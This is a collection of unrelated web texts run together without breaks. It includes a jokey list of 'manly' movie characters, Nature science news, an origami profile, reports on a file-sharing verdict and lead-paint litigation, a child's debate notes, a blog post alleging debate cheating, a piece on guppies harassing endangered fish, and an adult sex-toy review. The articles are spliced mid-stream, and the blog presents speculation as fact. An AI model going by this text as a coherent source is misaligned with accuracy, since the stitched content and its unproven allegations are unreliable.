There are just some movie characters that make you , as a man , want to beat your chest and just let out a mighty “ GGRRRRRR ” .
After watching one of their movies you just walk a little taller , you fear nothing , you perceive more women wanting you and you feel the call of the warrior rushing through your man veins .
Yes , each one of these characters is a Man ’s Man , and we at TMB salute them all .
Here now is our list of the Top 10 “ Hell Yes I ’m A Man ” movie characters .
10 ) Tony Montana ( Scarface )
The Godfather may or may not be a better overall film , but no question Tony Montana is Al Pacino ’s crowning achievement as an actor .
Brutal , driven , passionate .
All these things and more .
“ Then when you get the money , you get the power .
Then when you get the power , then you get the women ” .
Damn right Tony… damn right .
It ’s insane how well this movie ages .
Like
The Godfather , it ’s one of those movies that when people watch it for the first time they ’re still blown away by it … and Tony is the main reason for that .
GRRR !!!
9 ) Snake Plissken ( Escape From New York )
The coolest man in the history of the planet to wear a patch over one eye who was n’t a pirate .
The role that Kurt Russell will probably always be most identified with .
Snake will kick you in the balls just to say hello … even if he has to go into Manhattan to do it .
“ I got just one question .
Which one of you assholes gets to die trying to stick me ? ” Ok that was from Escape From LA , but it ’s still Snake .
Now that ’s a name !
Snake !
You know you have to be bad ass to cary that moniker .
8 ) John McClane ( Die Hard )
I do n’t care if the rest of the day John McClane listens to Abba while trying on his latest order from Victoria ’s Secret , drinking apple martinis while talking about the most recent fashion trends in France … when you have a gun fight against Austrian terrorists running barefoot over broken glass and yell out a line like “ Yippee Kiay Mother Fucker ” while whacking a bad guy like Han Gruber …
YOU ARE A MAN ’S MAN and deserve a spot on this list .
7 ) Harry Callahan ( Dirty Harry )
Anyone today who calls another person a “ punk ” comes off sounding like a total knob … unless that person is Dirty Harry ( Clint Eastwood ) .
The man ’s eyes alone are enough to make you crap yourself 3 times before he says his first grisly sounding words , and may heaven help you if he decides to go for his piece .
“ Go ahead punk .
Make my day ” is a line that delivered by anyone else would be instantly forgotten … but from the divine lips of Dirty Harry , they become a part of our cultural lingo .
6 ) General Maximus Decimus Meridius ( Gladiator )
I do n’t know about you , but if I start giving someone a hard time and I bark at them to tell me their name … and they turn around , look at me square in the eyes and say “ My name is Maximus Decimus Meridius , commander of the Armies of the North , General of the Felix Legions , loyal servant to the true emperor , Marcus Aurelius .
Father to a murdered son , husband to a murdered wife .
And I will have my vengeance , in this life or the next . ”
I ’m offering my appologies for my rudeness and praying to the Roman gods that the dude let ’s me walk out of there alive .
5 ) John J. Rambo ( First Blood )
I remember as a kid watching First Blood for the first time , and seeing John J. Rambo sewing himself up after ripping a cut open while falling through the trees .
That was the single most macho thing I had seen any character in any movie do at that point in my very young life .
If life has taught me anything , it ’s that you ’ve got to be one tough sonofabitch to stand up to Brian Dennehy .
4) Conan ( Conan The Barbarian )
You ’re at a party , everyone is having a good time and you ’re standing at the bar waiting for your next beer , so you decide to make conversation with the dude next to you by asking “ Parties like this are the best parts of life … what do you think are the best things about life ? ” and he turns to you and responds “ ” To crush your enemies , to see them driven before you and to hear the lamentations of their women ” then you are in the presence of a MAN .
Back away bowing before his pure male awesomness .
3 ) King Leonidas ( 300 )
When you ’re king , and you have a body that looks like it was chiseled out of a mountain side , and you ’re banging a woman like Lena Headey each night who refers to you as “ My Lord and My King ” … then you ’re damn right you get to walk around in nothing but a lion cloth and there ai n’t anyone who is going to say squat about it .
THIS IS SPARTA !
That dude can order soup in that yelling , Lion like roar of his and it would still sound wicked .
I guess growing up in a kingdom where it ’s cool to try to kill your kids just to see if they survive kinda helps .
2) Beowulf ( Beowulf )
This was the guy who inspired this list .
The man swims 5 days , kills 9 giant sea monsters and then still has the energy to bang a turned on Mermaid who watched him do it all .
This my friends is a chest pounding , awe inspiring beast of a man .
He represents what deep down all of us penis equipped people aspire to be .
We all wish we could shout normal phrases in the third person with massive threatening conviction “ I am John , and John demands 2 cheese burgers with a side of fries , or by Oden I shall strike you dead where you stand filthy dog ” .
1 ) Spartacus ( Spartacus )
You think you had it rough as a kid ?
Try growing up a slave in ancient Rome with the whip at your back .
Bought and sold like an animal , trained to be a gladiator , forced to fight in the area … then saying “ Enough of this shit ” , and you rally all the slaves together and say “ Let ’s kick ass ” and form an army that nearly topples the entire Roman Empire .
Grrrrrrr baby !
You ’ll even kill your own best friend just so you can hang on a crucifix instead of them having to suffer through it .
GGRRRRRRR !!!!
Not to mention , Kirk Douglas is the single most manly man the world has ever known , and even at his current age and health he could beat the living crap out of you .
All hail Spartacus !
All hail Kirk Douglas !
The most macho of us all !
Published online 22 January 2008 | Nature | doi:10.1038/news.2008.518
News
Acoustic method could quickly catch counterfeit coins .
Now hear this : the jingle of a good coin is different from a fake .
GETTY
You might assume that counterfeiters only bother with high - value bank notes , but there is a chance that some of the coins jangling around in your pocket right now are fake .
If Mototsugu Suzuki gets his way , it may be that jangling that gives them away .
Suzuki , a researcher at the Tokyo Metropolitan Police Department ’s Criminal Investigation Laboratory in Japan , has developed a way of examining coins based on the sound they make .
The traditional method of spotting a fake coin is to look at it — very closely .
While this requires equipment no more specialist than a reasonable microscope , says Suzuki , it is time consuming and can cause " a lot of trouble " if the coins are heavily worn or when a large number of counterfeit coins are in the system .
This is n't just a theoretical problem .
In Japan , so many counterfeit 500 - yen coins ( worth just under US$ 5 each ) were found in cash dispensers in 2005 that the coin was temporarily removed from use .
In a paper in Forensic Science International1 , Suzuki proposes a quick and easy way of sorting the fakes from the genuine article .
The penny drops
In Suzuki ’s method , coins slide down a slope and then fall onto a brass block .
The sound they make on impact is relayed via a microphone to a computer .
Although the human ear cannot usually tell the difference between real and fake , a computer can .
Genuine 500 - yen coins showed four distinctive peaks of natural resonance frequencies in the 5 - 20 kilohertz range .
This was not the case for fakes ; some fakes produced only three peaks , while others showed four but at different frequencies to genuine coins .
In addition to helping detect counterfeits , the sound data could be used to build up a database of fake coins , suggests Suzuki .
This might help law enforcement officers to prove how many coins one counterfeit operation is responsible for .
Ka'ching
Robert Matthews , who previously worked for the United Kingdom ’s Royal Mint and now runs his own coin-authentication business , says that there is a long history of using sound to check coins — but only by ear .
Experts at mints could often spot the ' ring ' of badly cast coins when they dropped onto surfaces , he says .
Poor - quality lead fakes could easily be detected from their dull ' thunk ' .
ADVERTISEMENT
Suzuki 's method provides a hi-tech update on this old method , allowing more sophisticated fakes to be more quickly detected , he says .
" This technique offers the promise of monitoring circulation coins and identifying the counterfeits , " says Matthews .
It could even be added to automated coin sorting and counting machines to ramp up fraud detection .
" Obviously it needs to be proved that the technique will identify all types of counterfeits , " he adds .
© All Rights Reserved .
Please do not distribute without written permission from Damn Interesting .
Goliath Beetle , robert j. lang origami
Since childhood Dr. Robert Lang has practiced origami .
It was the convergence of his intensely creative mind and this ancient Japanese tradition that gave rise to his unique style of origami , which he developed into a renewed art and ultimately a science of practical application .
His intricate paper insect creations were a departure from the standard boats and cranes that have long been the tradition of origami .
Over time his works grew more complex , featuring hundreds of folds and multiple pieces of paper , such as a full - scale cuckoo clock .
Between his efforts to earn a PhD in applied physics , his job at NASA ’s Jet Propulsion laboratory , his eighty technical papers , and his forty - six patents in optoelectronics and lasers , he somehow found time to implement and evolve a number of original origami designs .
The practicality of his scientific research began to influence his origami designs , until the line between the two began to blur .
He participated in a project at EASi Engineering to develop complicated crease patterns for airbag folding designs .
Lang also worked to design a mesh wire heart support to be folded and implanted in congestive heart failure patients ; once inside , it would expand , protecting the heart .
His most ambitious project to date , however , is shared with a team at the Lawrence Livermore National Laboratory , with whom he has developed a space telescope – one that is forty times larger than the Hubble and collapsible for space travel through a series of precise origami folds .
Though origami has been practiced in Japan for over four hundred years , some consider the master to be the late Akira Yoshizawa , born 1911 .
At 26 Yoshizawa left his job to pursue the art of origami .
Living at the edge of poverty he sold soup door - to - door while practicing his designs .
He finally achieved recognition at 43 when he was commissioned to create a series of origami zodiac figures for the magazine Asahi Graph .
From that point his influence extended to the west and eventually Europe where he was invited to display his work at the Louvre in 1998 .
It was masters like Yoshizawa who elevated the obscure hobby of origami to a respected art form and complex pursuit , which in time would capture the imagination and analytical mind of people like Dr. Robert Lang .
Robert Lang and a five meter prototype of the origami lens .
Approaching the challenge of seeing further into space begins with the task of constructing a larger lens , thereby allowing more light to be gathered and sharper images to be produced .
Constructing a large scale orbital telescope was the goal of the Diffractive Optics Group at the Livermore Laboratory .
The Hubble , a reflective telescope , utilizes a curved mirror to see objects ; whereas the new telescope would be designed using the principals of a transmissive telescope , which uses two separate lenses .
For this endeavor a special diffractive lens would be used .
This type of lens relies on microscopic , concentric circular grooves etched on the surface , which essentially create a hologram of a lens .
However , this was only the beginning : the project called for the lens to be 100 meters in diameter .
Though space vehicles vary in design they all have similar limited payload space , 4 meters in diameter and 100 10 meters long .
The lens would have to somehow fit in this narrow compartment shaft to be launched into space .
This is where Dr. Robert Lang entered the picture .
The Diffractive Optics Group contacted Dr. Lang and requested a visit .
After examining the problem , Lang explored various origami designs that could be applied to the lens .
It became evident that through a limited number of collapsible facets , the size of the lens could be reduced with origami folds while maintaining the integrity of the surface once expanded in space .
Though the design is unique , the concept has been explored in the past .
In the 1980s a Japanese space research team needed to engineer an unfolding solar panel as part of a satellite design .
They called on scientist Dr. Koryo Miura to approach the task .
Miura , proficient in origami , once explored methods of folding maps so that they may be unfolded with one simple pull of a corner .
This method , the Miura - ori origami pattern , became the basis for various solar arrays .
Later in 2005 , Harvard scientist Dr. Lakshminarayanan
Mahadevan published findings that nature exhibits this same pattern in the folding of a leaf and its internal framework .
In fact , this pattern can also be found in wings and flower petals , which begin as folded structures .
Allosaurus Skeleton , robert j. lang origami
Dr. Lang and the telescope team eventually agreed upon an umbrella - like folding structure which would allow it to fit in a rocket ’s cargo hold .
The expanded lens would have to be perfectly symmetrical to allow spin-stabilization to occur properly when it is positioned in orbit 25,000 miles away from Earth .
The full size lens will consist of 72 separate pieces of glass , each piece only 7 millimeters thick .
The multifaceted design also provides durability .
If a meteoroid shatters one or even several pieces of the glass , the lens will still be capable of producing images .
The two lenses will not be connected physically ; rather they ’ll orbit the Earth thousands of meters apart , using precision thrusters to maintain their relative positions and alignment .
The “ eyepiece ” lens will double as a communication module , storing the images and transmitting them home .
This revolution in design will allow scientists to gaze ten times further into space .
Though a promising concept , many other technical issues would have to be addressed in the development phase .
One such issue would be achieving a smooth surface when unfolded .
Many of these hurdles would have to be worked out during the design of a prototype , a process that continues to this day .
Dr. Lang has also harnessed the power of computer technology to explore the future of origami .
His TreeMaker software can translate crude stick - figure images into original origami patterns , and his Reference Finder program translates these computer - generated patterns into human - readable instructions .
Now a full time origami artist , Dr. Lang often creates figures freely without the burden of unanswered scientific questions or looming deadlines .
The simplicity and elegance of the craft still has enormous draw despite the technology afforded by his programs and special laser paper cutters .
Often he sells his creations , the most popular is a free standing nine inch tall bull moose .
Other animal creations can be found in his books such as The Complete Book of Origami .
Origami moose , robert j. lang origami
His acumen for paper folding has not only attracted the attention of scientists , but also artists .
He has worked with various production companies to produce animated origami sequences for products like the Toyota Avalon .
A more ambitious project involved creating a world entirely out of origami figures for a Mitsubishi Endeavor TV spot .
A recent McDonald ’s commercial features Dr. Lang ’s talents in the form of numerous origami figures crafted from cheeseburger wrappers .
Perhaps the latticework of creases makes the art form its own best metaphor , illustrating its ability to shape , join , and intersect so many areas of inquiry .
In spite of its age , the ancient multi-faceted discipline continues to offer useful insights within the realms of art , science and humanity .
Duluth , Minnesota —
After just four hours of deliberation and two days of testimony , a jury found that Jammie Thomas was liable for infringing the record labels ' copyrights on all 24 the 24 recordings at issue in the case of Capitol Records v. Jammie Thomas .
The jury awarded $ 9,250 in statutory damages per song , after finding that the infringement was " willful , " out of a possible total of $ 150,000 per song .
The grand total ?
$ 222,000 in damages .
After the verdict was announced , Thomas and her attorney Brian Toder quickly left the courtoom .
Toder offered a terse " no comment " when asked if Thomas had any intention to appeal the case .
The jury was also in no mood to talk to the media , choosing instead to be escorted out of the courthouse by court personnel , ignoring the battery of television cameras and TV reporters at the foot of the courthouse steps .
The plaintiffs ' legal team spent a few minutes talking to the jury after the verdict was announced , finally emerging from the courthouse to take questions from the media .
The first question asked of Gabriel was whether the RIAA would enforce and try to collect the judgment .
Gabriel replied that he had n't had the chance to talk to the client about that yet .
He said that the jury did not explain how they arrived at the $ 9,250 figure , but that they expressed to the legal team that the case was " clear and well - presented . "
Gabriel also noted the magnitude of the case in response to a question .
" We appreciate the opportunity to put out in daylight the facts and evidence collected in this case , " he replied .
" This does send a message , we hope , that both downloading and distributing music is not ok . "
When asked if there was an end game in sight for the series of lawsuits , Gabriel said that it was up to the RIAA to decide .
RIAA lead counsel Richard Gabriel
addressing the media after
the verdict was announced
Defense closing arguments
Before the deliberations began , counsel for both parties presented their closing arguments .
Thomas ' attorney , Brian Toder , went first ( per court rules ) .
Speaking forcefully and only referring to his notes rarely , he took 15 minutes to make his points .
He started off by repeating his assertion from the opening arguments that the defendant was in a " tough role " given what the jurors had heard and seen in the courtroom .
" There are certainly alternative explanations , because my client did n't do it , " he told the jury .
" Someone used her name and IP address — it 's not impossible . "
Toder then reminded the jury that they have the burden of " proving that Jammie Thomas was the human being calling herself ' tereastarr ' doing all of this . "
Toder then turned to the RIAA 's witnesses , beginning with Mark Weaver of SafeNet .
" He 's a stand - up guy , " Toder told the jury .
" But he never once said that Jammie Thomas did this — just tereastarr at an IP address . "
He then moved on to David Edgar , manager of Charter 's Internet security department and noted that he did n't testify that the MAC address from the cable modem rented to Thomas identified a specific computer .
Toder then turned his attention to the RIAA 's expert witness , Dr. Doug Jacobson .
Calling him the plaintiff 's expert a " hired gun , " Toder said " I think you saw he was making things up as he went along . "
He focused on the debate over the presence of the songs on the hard drive examined by Jacobson , and argued that the defense proved definitively that Jacobson was " absolutely wrong " about his assertion that it would not have been possible to rip the songs on the hard drive from CD given the time stamps .
He also argued that the notoriety from the case helped Jacobson 's security business , Palisade Systems , and that the " five or six hours " Jacobson said he spent on the case means he could not have given it the time and attention it deserved .
Wrapping up his closing argument , Toder touched on the discrepancy in the dates given for the hard drive replacement , saying that it was an honest mistake , given that numerous dates in her deposition were a year off across the board .
He then reminded the jury that MAC and IP addresses can be spoofed .
" We can't prove it happened , but we do n't have to . "
Toder concluded by saying that the plaintiffs did not meet their burden of proof and said that the jury does n't have to award the record companies money in this trial " because they did n't earn it . "
The RIAA 's closing arguments
Richard Gabriel then presented the closing argument for the record labels .
Gabriel first addressed Toder 's remarks , saying that he talked about " theories and speculation " that have nothing to do with this case .
After reminding the jury that they had seen nothing indicating that the record labels in the case were not the owners of the copyrights in question , Gabriel then ran through the record labels ' evidence , " The real issue in this case is whether the defendant violated the record companies ' exclusive rights , " he said .
" We do n't have to prove who got the file from the defendant . "
Gabriel ran through the screenshots showing the user tereastarr@KaZaA and then showed other instances of her using the same screenname online .
" All the fingers in this case point to Jammie Thomas , " he argued .
He ticked off the evidence of the MAC and IP addresses , a password - protected PC that only the defendant had access to , use of the tereastarr nickname across several services and e-mail accounts across the years , and the " eclectic musical tastes " of Thomas that he said were reflected both on the hard drive and in the shared folder .
" These things all point in one direction , and only one direction : that of Jammie Thomas , " he said .
" Jammie Thomas infringed the record companies ' copyrighted recordings . "
Gabriel concluded by telling the jury that Thomas does n't respond to the evidence " because she can't . "
It 's " misdirection , red herrings , and smoke and mirrors , " he told the jury .
He defended Weaver and Jacobson 's testimony , wrapping up by saying that the " greater weight " shows that the defendant did it .
" She refused to accept responsibility , so we come to you to ask you to hold her responsible , " he said , asking the jury to find her liable and to consider the need for deterrence in awarding statutory damages .
With that , the jury instructions were read into the record and the jury filed out to begin deliberations .
One down , many more to go ?
The first case has gone to trial , and the verdict is in .
The music labels now have a notch on their belt , while a woman who spent thousands of dollars on their product is now faced with a large judgment .
The RIAA hopes that this and the 20,000 other cases serve as a deterrent to would - be file - sharers , but the question of whether or not the music industry is engendering so much hostility and bad press with its campaign that it outweighs any short - term benefits remains .
With a verdict in their favor , the RIAA hopes to ratchet the campaign of fear up a notch and says it will press forward with its legal campaign .
Published online 12 September 2007 | Nature | doi:10.1038/news070910-5
News
Artificial atoms made of annihilating particles can pair up .
Molecules can be made between matter and antimatter - if only briefly .
Getty
Two years after reporting the first tantalizing hints that matter might be able to bind with antimatter , researchers in California have nailed convincing evidence for the pairing .
David Cassidy and Allen Mills at the University of California at Riverside say that they have found the signature of a molecule in which two positrons — antimatter siblings of electrons — are bound together by electrons1 .
This hybrid substance is called molecular positronium , denoted Ps 2 .
Because electrons and positrons have equal and opposite charges , they can become bound together by their electrical attraction , just as a positively charged proton is orbited by an electron in ordinary hydrogen atoms .
In theory , positronium atoms — electron - positron pairs — should also be able to pair up to form molecules , just as two hydrogen atoms form H2 .
Because the mass of a positron is just 1/1836 that of a proton , positronium molecules are much lighter than hydrogen .
But Ps 2 is peculiar stuff .
Rather than being two well - defined atoms stuck together , the four particles " do a merry dance around each other in a fuzzy , lump - less soup " , says physicist Clifford Surko of the University of California in San Diego .
Muzzy molecules
“ Almost as soon as they are made , they disappear again with a puff and a flash of light ” Clifford Surko , University of California at San Diego
These molecules are very hard to see because matter and antimatter annihilate each other , releasing a burst of energy in the form of gamma-rays .
When isolated in a vacuum , positronium atoms typically survive for less than a millionth of a second before they self - destruct .
" Almost as soon as they are made , they disappear again with a puff and a flash of light , " says Surko .
But Cassidy and Mills found that if they could capture enough positronium , some of the pseudo - atoms might combine before they vanish .
If that happens , the positronium molecules would then release a characteristic gamma-ray signature when annihilation eventually occurs .
So the researchers fired a beam of positrons ( made with a technique developed by Surko ) into porous silica glass , in an attempt to pick up electrons and make Ps2 .
They estimated that they had a one - in - ten chance of two positronium atoms combining .
Mills and his colleagues first reported that this might happen in 2005 ( see ' Did matter - antimatter mix yield molecules ? ' ) .
But it has taken until now to firm up the evidence .
Cool stuff
The clinching data come from looking at how the intensity of the gamma- rays changes as the temperature is altered .
Electron - positron annihilation should be more rapid in Ps2 than in lone positronium atoms , because the binding increases the chance of collision .
And the positronium mix should have a greater proportion of molecules at lower temperatures , since the cold makes molecules more stable .
So the gamma- rays should become more intense when the mixture is cooled .
That 's exactly what the researchers saw , they report in Nature .
ADVERTISEMENT
Ultimately , says Surko , studying these blends of matter and antimatter could help to answer one of the most perplexing questions in fundamental physics : why is there so much more matter than antimatter in the Universe ?
Mills also has a practical goal : to make Ps 2 in sufficient quantities to create a laser from the very - high - energy gamma - rays released in annihilation .
To achieve this , says Mills , " we have the ambitious goal of making not two but many thousands of positronium atoms interact with each other . "
Visit our moleculesmad.html " > newsblog to read and post comments about this story .
Digg
del.icio.us
Newsvine
Reddit
Facebook A 17 - year - old Milwaukee boy who was poisoned by lead as a baby faces off today against the nation 's leading makers of lead - based house paint , hoping to prove that for half a century they knew their product made people sick .
It 's the latest in a long string of lawsuits — virtually all of them unsuccessful — against companies such as Dutch Boy and Sherwin - Williams , which manufactured the paint Americans used for decades .
But Steven Thomas ' trial in Milwaukee could change the nature of product liability lawsuits .
Thomas ' suit was filed in 1999 against Sherwin - Williams , American Cyanamid , NL Industries — which marketed Dutch Boy — and others .
What sets it apart is a 2005 Wisconsin Supreme Court ruling that Thomas ' attorneys do n't need to prove the companies manufactured the specific paint that made him sick .
All they have to prove is that the companies were making lead paint when the homes in which Thomas lived were built , from 1900 to 1905 , that the paint sickened him and that the manufacturers knew of that danger .
" It 's testing out the old theory of liability … that x party did y , " says Jane Genova , a writer on legal topics who has followed this litigation for years .
" Now with this , you do n't have to prove the old things . "
Thomas , who was born in 1990 , suffered mental retardation after three years of exposure to lead dust and chips in two rental homes , court documents say .
He 'll require lifetime medical monitoring and is at high risk for kidney disease , high blood pressure and heart disease , among other conditions .
A decision in Thomas ' favor could bring an explosion in suits on behalf of children sickened by lead .
More than 1,400 Milwaukee children tested positive for high lead levels in 2006 alone , the city 's health department says .
The American Academy of Pediatrics estimates that one in four U.S. children lives in housing with deteriorated lead paint .
Given their track records , cases such as Thomas ' are long shots .
The first was filed in 1987 , and since then more than 100 have followed .
Only five have made it to trial , and only one , in Rhode Island in 2005 , has been successful .
In that case , the state sued three paint makers .
State officials last month said it will cost about $ 2.4 billion to clean up hundreds of thousands of lead - painted homes .
The companies are appealing the verdict , in which a jury decided the paint constituted a " public nuisance " that the manufacturers had to clean up .
Thomas ' legal team says paint makers knew as far back as the early 1900s that lead was dangerous but fought attempts to regulate or ban it .
Paint manufacturers have said in court that they knew lead paint was dangerous , but that , properly handled , it was safe — indeed , they have pointed to federal standards that recommended homeowners use lead paint because it was durable .
Through the 1940s , house paint was up to 50 % lead by weight .
In 1978 , the U.S. government banned lead altogether from paint .
Share this story : Digg del.icio.us Newsvine Reddit Facebook Conversation guidelines : USA TODAY welcomes your thoughts , stories and information related to this article .
Please stay on topic and be respectful of others .
Keep the conversation appropriate for interested readers across the map .
I 've avoided the debates until now because I saw them as little more than exercises in media manipulation .
This time , I wanted to watch the Republican debate just to hear the other candidates respond to Ron Paul .
Unfortunately , I had a scheduling conflict so I asked a kid to take notes for me .
As the debate began , I drew a quick seating chart of the candidates to help the kid keep track of who said what and then ran off .
BTW - this is not snark .
This is a straight rendition from a 9 year old .
The only changes I made were for spelling errors ( except the names ) .
It must have been more difficult thant I thought to keep track of all the new names .
That 's the only reason I can think of to explain why this reporter devised their own naming strategy to keep track of the candidates .
Aside from that , it seems they got all the high points .
Follow me below the fold for the 9 - years old rendition of a fight between Sarge , Wrinkles , Bunny Ears , Oily , Beagle Eyes and Carrot Face ...
I 've avoided the debates until now because I saw them as little more than exercises in media manipulation .
This time , I wanted to watch the Republican debate just to hear the other candidates respond to Ron Paul .
Unfortunately , I had a scheduling conflict so I asked a kid to take notes for me .
As the debate began , I drew a quick seating chart of the candidates to help the kid keep track of who said what and then ran off .
BTW - this is not snark .
This is a straight rendition from a 9 year old .
The only changes I made were for spelling errors ( except the names ) .
It must have been more difficult thant I thought to keep track of all the new names .
That 's the only reason I can think of to explain why this reporter devised their own naming strategy to keep track of the candidates .
Aside from that , it seems they got all the high points .
Follow me below the fold for the 9 - years old rendition of a fight between Sarge , Wrinkles , Bunny Ears , Oily , Beagle Eyes and Carrot Face ...
They are rude
Interrupt alot !
Beagle Eyes
Arrogant foreign policy
We need 400,000 troops
Do n't let politicians get involved
Leave it to military with blood on their boots .
Carrot Face
President policy good
War good
Patriot Act good
Electric snooping good
Capturing Saddam mistake
Surge mistake
Clinton peace dividend bad
We need more troops
We need more ships
Wrinkles
Constitution has 10 Amendments
Immigration is bad
Secure border from immigration
Sarge
Bush right
America is safe
America is not safe
America is safe
Rumsfeld failure
Petraeus is good
Strategy was bad
Now it is good
Sarge is confusing
Bunny Ears
We are bullies
Policemen
If not listening we bomb them .
If listening we give them money .
Oily , Wrinkles and Carrot Face are making fun of Bunny Ears .
Carrot Face
Olympics got attacked
Fight .
Fight .
Interrupt .
Fight .
New topic
Healthcare best in the world .
War funds for health care
10 % inflation
Inflation needs to be under control
Oily
They do n't need Hillery care ?
Bunny Ears
People go to India for heart surgery
airplane + hotel + surgery = 50 % of cost in America .
People do n't have health insurance .
Wrinkles and Oily fighting about man dates .
Oily says man dates are ok sometimes .
Wrinkles does n't like dating men .
Fight .
Fight .
Next Page 1 | 2 | 3
( Note : You can view every article as one long page if you sign up as an Advocate Member , or higher ) .
This is a tale of our upside - down election world .
Please read it from the bottom up .
UPDATE # 3 : Having ruled out the possibility that one of the other candidates was whispering to himself , MSNBC has added an update to its blog post concluding that someone in the audience must have been whispering near an " open mic . "
This is apparently based on nothing other than MSNBC 's inability to come up with any other explanation , other than the obvious one .
This now reads like a report on an election result that varies wildly from the exit polls .
Such a result ( if in the United States , abroad the opposite would be true ) clearly proves that the exit polls must have been wrong !
How do you know ?
Why , by ruling out the possibility that it was caused by Huckabee whispering to himself .
In case shame takes over and the latest MSNBC conclusion gets purged , here it is :
" After reviewing the tapes , NBC determined that an open mic picked up a whisper from the audience .
It is unclear who it is that says it , but it was not said by any of the candidates , was not heard in the hall and , more importantly , not heard by the candidates . "
How do we know it was not heard by the candidates ( not even the one who appears to hear it and repeat it ) ?
Why , because MCNBC tells us so .
Seriously , I can't prove Romney was prompted , but that 's the far more likely conclusion than MCNBC's .
Maybe if they hired OJ to find the real whisperer I 'd take them seriously .
If the next debate has strip searches and cavity searches prior to the opening bell , I 'll consider even watching it .
UPDATE #2 : MSNBC has posted a new blog post acknowledging that people want to know what happened but not offering any explanation .
The post claims that MSNBC does not know whose voice is heard whispering , and that MSNBC is reviewing tapes of each of the candidates in order to determine whether it was one of them .
This would tend to suggest that MSNBC does not think it was one of their staffers in a control room , and does not think it was one of their staffers feeding ideas to Russert .
( I 'm still unable to find the readers ' comments on this on the MSNBC blog , and if they were deleted the new post says nothing about restoring them . )
UPDATE #1 : MSNBC has given Raw Story an explanation that explains nothing , saying Romney 's microphone was not working .
That 's funny : during the whisper , Romney 's lips are n't moving .
What difference would it have made in any way for his microphone to have been working or not working ?
ORIGINAL POST : Romney 's ( or is it Russert 's ? or one of the other candidates '? ) debate cheating may finally force this collection of evidence of Bush 's cheating into the news .
Why did MNBC delete its blog post about it ( and the reader comments that preceded and were referred to in the blog post ) ?
Please CONTACT THE MEDIA .
We know Bush cheated .
We know almost certainly that somebody just cheated in this latest debate .
We can be pretty sure the media questioners cheat , which - among other reasons - makes them reluctant to report on candidate cheating .
We can suspect that the person who cheated in the latest debate was Romney , but it could have been Russert or one of the other candidates .
This blog points out that the whisper begins mighty soon to be a prompt for Russert .
If there 's an innocent explanation , such as a random person near an open mic , why the coverup on the blog and the nonsense explanation ?
The estate of author J.R.R. Tolkien and Rupert Murdoch 's HarperCollins Publishers sued the producer of the Lord Of The Rings movies , New Line Cinema , on Monday in a fight over profits from the blockbuster trilogy .
The trustees of the writer 's British charity , and News Corp 's HarperCollins cited a failure to pay a contractually agreed 7.5 per cent of gross profit for the three films based on the Lord Of The Rings novels .
The suit follows Rings director Peter Jackson 's lawsuit against New Line for underpayment that was settled in December .
When that deal was finalised , Jackson signed on to be executive producer of The Hobbit , also based on a Tolkien novel .
Sunday , during a town - hall meeting in Exeter , Giuliani assured a young questioner that preparedness will be key for all crises , including those from outer space .
" If ( there 's ) something living on another planet and it's bad and it comes over here , what would you do ? " a boy asked .
Giuliani , grinning , said it was his first question about an intergalactic attack .
"
Of all the things that can happen in this world , we 'll be prepared for that , yes we will .
We 'll be prepared for anything that happens , " said Giuliani , who mayor during the 9/11 terrorist attacks .
Endangered fish might face a new threat — sexual harassment .
Male Trinidadian guppies ( Poecilia reticulata ) are jeopardizing the survival of the critically endangered Mexican fish Skiffia bilineata by constantly sexually harassing the endangered females , research now reveals .
The guppies , which invaded Mexican rivers and lakes roughly 50 years ago , physically resemble S. bilineata , but are genetically distant from them .
Scientists knew that male Trinidadian guppies sexually assault females of their own species , and were concerned over whether they harassed the endangered fish as well .
The researchers found that when put in aquaria together , male Trinidadian guppies persistently tried having sex with the female S. bilineata , even when seven of their own females were present .
The male guppies are drawn to large females , and endangered females are larger than guppy females , the scientists noted .
Normally S. bilineata have sex by simply uniting their genital pores in a copulatory embrace .
Male Trinidadian guppies , on the other hand , have sex using a hooked organ — their " gonopodium . "
As such , they can damage the endangered females , and female S. bilineata have to spend a lot of energy dodging the guppies .
" Sometimes we observed harassed females jerking away from guppy males when the males appeared to have inserted their gonopodium , " said researcher Alejandra Valero , a behavioral ecologist at the National Autonomous University of Mexico in Mexico City .
" We are assessing several possible ways in which female Skiffia can be damaged by guppy sexual activity . "
The guppies could be contributing to the decline of the Mexican fish .
" Half of the species in the Goodeinae tribe to which Skiffia bilineata belongs are already at risk of extinction , " Valero said .
However , Valero stressed the guppies were not intentionally out to harm the endangered females or drive S. bilineata to extinction .
" It may seem like their sexual behavior is part of a strategy to displace native species in order to gain exclusive ownership of the habitat , " she told LiveScience .
However , the guppies " are doing only what they have been doing for the last million years , which is being highly efficient at passing their genes down to successive generations — only in this case , the genes end up in the wrong females ! "
Valero and her colleagues Constantino Mac?as Garcia and Anne Magurran detailed their findings online Jan. 23 in the journal Biology Letters .
The SaSi personal massager uses " sensual intelligence " to figure out how best to stimulate you . *
Image : Courtesy of Je Joue *
Given the number of smart toys infiltrating the rest of our lives , it puzzles me that it has taken so long for sexual devices to incorporate " sensual intelligence " into their designs .
But we 're finally starting to see sexual appliances that can compete in coolness with The Sharper Image 's kids - of - all - ages catalog , although not necessarily with the Roomba robotic vacuum .
British company Je Joue launched a new product , the SaSi , at the Adult Entertainment Expo last week in Las Vegas .
If the original Je Joue oral - sex simulator is like a 60 - GB iPod with multiple playlists you design yourself , the SaSi is like an iPod Nano with an automated Most Popular playlist .
The SaSi takes the best of the Je Joue – soft surface material , firm massage finger , sensual movements – and simplifies the control so all you have to do is press a button to say " yay " or " nay " to a particular movement .
It also has buttons to control speed and to add or remove vibration .
It 's the first intimate device I 've seen that remembers your preferences – and then deliberately steps outside those boundaries from time to time , to see what else you might like .
" When we started out with the research for SaSi , we wanted to find the ultimate movement that every woman loved , " says technical developer Duncan Turner , 28 , who I spoke with at the product launch party .
" We did a lot of testing with different women and discovered that although there are some similarities , everyone is different , particularly in the combination of movements that they enjoy most . "
When the original Je Joue came out in 2006 , I thought everyone would be clamoring for one , because frankly it 's the closest thing to cunnilingus you can get from a robot .
I thought that anyone who did n't want to bother with the whole " create your own motion pattern " aspect would still be pleased with the 10 on - board programs .
It turns out that the very fact that you can program and customize the Je Joue 's patterns of movement , and even exchange those patterns in a forum with other users , makes it sound too complicated for a lot of people .
Not because we 're too stupid to figure out the interface , but because we do n't generally script out solo sex play ahead of time .
Not to this degree , anyway .
The tech is easy .
The genius is making it work seamlessly with sex .
" Pre-programming movements is challenging for users as it requires precognitive thought for the experience , " Turner explains .
" With a real partner , one would rarely sit down prior to foreplay and explain exactly what they wanted at what point .
But communication during the experience is key . "
